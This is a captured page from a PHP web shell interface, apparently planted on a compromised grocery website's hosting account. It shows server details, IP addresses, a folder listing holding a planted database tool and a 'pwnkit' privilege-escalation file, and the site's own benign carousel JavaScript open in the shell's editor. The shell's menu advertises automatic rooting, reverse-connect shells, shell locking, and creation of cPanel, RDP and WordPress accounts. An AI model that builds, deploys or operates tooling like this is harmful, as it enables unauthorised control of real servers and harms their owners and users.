Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
jqueryui
[ DIR ]
drwxr-xr-x
adminer.php
465.43
KB
-rw-r--r--
bootstrap.min.js
69.03
KB
-rw-r--r--
custom-change-type.js
547
B
-rw-r--r--
custom.min.js
4.52
KB
-rw-r--r--
function7b30.js
99.03
KB
-rw-r--r--
jquery.min.js
84.89
KB
-rw-r--r--
owl.carousel.js
22.38
KB
-rw-r--r--
payment.js
1.22
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
select2.min.js
66.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.min.js
$(document).ready(function() { "use strict"; var i; (i = $(".owl-carousel-featured")).length > 0 && i.owlCarousel({ items: 5, lazyLoad: !0, pagination: !1, loop: !0, autoPlay: !1, navigation: !0, stopOnHover: !0, navigationText: ["<i class='mdi mdi-chevron-left'></i>", "<i class='mdi mdi-chevron-right'></i>"], }), (i = $(".owl-carousel-category")).length > 0 && i.owlCarousel({ items: 6, lazyLoad: !0, pagination: !1, loop: !0, autoPlay: false, navigation: !0, stopOnHover: !0, navigationText: ["<i class='mdi mdi-chevron-left'></i>", "<i class='mdi mdi-chevron-right'></i>"], }), (i = $(".owl-carousel-brand")).length > 0 && i.owlCarousel({ items: 8, lazyLoad: !0, pagination: !1, loop: !0, autoPlay: false, navigation: !0, stopOnHover: !0, navigationText: ["<i class='mdi mdi-chevron-left'></i>", "<i class='mdi mdi-chevron-right'></i>"], }), $('[data-toggle="offcanvas"]').on("click", function() { $("body").toggleClass("toggled") }); var o = $(".owl-carousel-slider"); o.length > 0 && o.owlCarousel({ items: 1, lazyLoad: !0, pagination: !0, autoPlay: 4e3, loop: !0, singleItem: !0, navigation: !0, stopOnHover: !0, navigationText: ["<i class='mdi mdi-chevron-left'></i>", "<i class='mdi mdi-chevron-right'></i>"] }), $("select").select2(), $('[data-toggle="tooltip"]').tooltip(); var e = $("#sync1"), t = $("#sync2"); e.owlCarousel({ singleItem: !0, slideSpeed: 1e3, pagination: !1, navigation: !0, autoPlay: false, navigationText: ["<i class='mdi mdi-chevron-left'></i>", "<i class='mdi mdi-chevron-right'></i>"], afterAction: function(i) { var o = this.currentItem; $("#sync2").find(".owl-item").removeClass("synced").eq(o).addClass("synced"), void 0 !== $("#sync2").data("owlCarousel") && function(i) { var o = t.data("owlCarousel").owl.visibleItems, e = i, a = !1; for (var l in o) if (e === o[l]) var a = !0; !1 === a ? e > o[o.length - 1] ? t.trigger("owl.goTo", e - o.length + 2) : (e - 1 == -1 && (e = 0), t.trigger("owl.goTo", e)) : e === o[o.length - 1] ? t.trigger("owl.goTo", o[1]) : e === o[0] && t.trigger("owl.goTo", e - 1) }(o) }, responsiveRefreshRate: 200 }), t.owlCarousel({ items: 5, navigation: !0, itemsDesktop: [1199, 10], itemsDesktopSmall: [979, 4], itemsTablet: [768, 4], itemsMobile: [479, 4], pagination: !1, navigationText: ["<i class='mdi mdi-chevron-left'></i>", "<i class='mdi mdi-chevron-right'></i>"], responsiveRefreshRate: 100, afterInit: function(i) { i.find(".owl-item").eq(0).addClass("synced") } }), $("#sync2").on("click", ".owl-item", function(i) { i.preventDefault(); var o = $(this).data("owlItem"); e.trigger("owl.goTo", o) }) }); window.onscroll = function() { myFunction() }; function myFunction() { console.log(document.body.scrollTop + "------------" + document.documentElement.scrollTop); if (document.body.scrollTop > 70 || document.documentElement.scrollTop > 70) { document.getElementById("top-navbar").classList.add("fixed-header"); } else { document.getElementById("top-navbar").classList.remove("fixed-header"); } } (function() { window.inputNumber = function(el) { var min = el.attr('min') || false; var max = el.attr('max') || false; var els = {}; els.dec = el.prev(); els.inc = el.next(); el.each(function() { init($(this)); }); function init(el) { els.dec.on('click', decrement); els.inc.on('click', increment); function decrement() { var value = el[0].value; value--; if (!min || value >= min) { el[0].value = value; } } function increment() { var value = el[0].value; value++; if (!max || value <= max) { el[0].value = value++; } } } } })(); inputNumber($('.input-number'));
Close